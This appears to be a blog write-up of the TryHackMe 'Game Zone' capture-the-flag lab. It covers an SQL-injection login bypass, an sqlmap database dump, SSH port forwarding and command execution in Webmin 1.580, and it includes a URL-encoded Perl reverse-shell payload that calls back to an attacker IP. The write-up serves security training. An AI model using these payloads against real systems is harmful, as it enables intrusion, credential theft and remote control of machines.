« back

Game Zone | Writeup

CTF, CyberSecurity, TryHackMe

Game Zone #

Hallå gubbar , I’m a big fan of Sql injection vulnerabilities and i ‘m in love with Sqlmap for ages and we are lucky to have this box to work on not hard at all and very easy if you follow up carefully . try it out at Game Zone

Enumeration #

Nmap scan & Results:

nmap -sV -p- -vv BoxIP

22/tcp open ssh 80/tcp open http

so we have and web server and ssh services running so lets go to

http://Ip-Box:80/

Exploitation #

we will find a login with Agent-47 image which is vulnerable to auth sql injection

Try this to bypass

USERNAME: admin' or '1' = '1'; -- -

PASSWORD: vvv

After login we can see that we have a search bar (after trying other injection commands) we can confirm that it also vulnerable to sql injection in the “searchitem “id parameter

Now we can jump to sqlmap to dump data

What we need ?

  1. Get request
  2. Request file
  3. Sqlmap

results : userpass

Command:

sqlmap -r dirofrequest.txt  --dbms=mtsql --dump
OptionsMeaning
-ruses the intercepted request
–dbmstype of database
–dumpdump all data

alt text

alt text

To crack the hash use any offline tools or online services

Reverse SSH tunnels #

so as we find earlier that we have a ssh service we will try to login with same credentials

this command :

sshpass -p Password ssh -l Username Box-Ip

then run this command:

ss -tulpn

ss to investigate sockets running on the host

we find that there’s 5 TCP socket running and 1000 port is blocked via firewall rules

so now let try to kill processes using Ctrl+Z

then re-login to ssh using this command:

 ssh -L 10000:localhost:10000  Username@Box-Ip

alt text

User Flag:

alt text

then go to

http://localhost:10000/

and just login with same credentials

alt text

CMS Webmin version 1.580

Reverse shell #

Use searchsploit webmin

https://www.exploit-db.com/exploits/21851

We have two option to exploited either metasploit or manual …

go manual for faster results



'Name'           => 'Webmin /file/show.cgi Remote Command Execution',
			'Description'    => %q{
					This module exploits an arbitrary command execution vulnerability in Webmin
				1.580. The vulnerability exists in the /file/show.cgi component and allows an
				authenticated user, with access to the File Manager Module, to execute arbitrary
				commands with root privileges. The module has been tested successfully with Webim
				1.580 over Ubuntu 10.04.
res = send_request_cgi(
			{
				'uri'     => "/file/show.cgi/bin/#{rand_text_alphanumeric(rand(5) + 5)}|#{command}|",
				'cookie'  => "sid=#{session}"
			}, 25)


http://localhost:1000/file/show.cgi/bin/#{rand_text_alphanumeric(5)}|#{command}|

http://localhost:1000/file/show.cgi/bin/#{rand_text_alphanumeric(5)}|perl%20-e%20'use%20Socket;$i=%22Your-ip%22;$p=Your-PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname(%22tcp%22));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,%22%3E&S%22);open(STDOUT,%22%3E&S%22);open(STDERR,%22%3E&S%22);exec(%22/bin/sh%20-i%22);};'%20|

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Root Flag #

alt text

The end …see you next time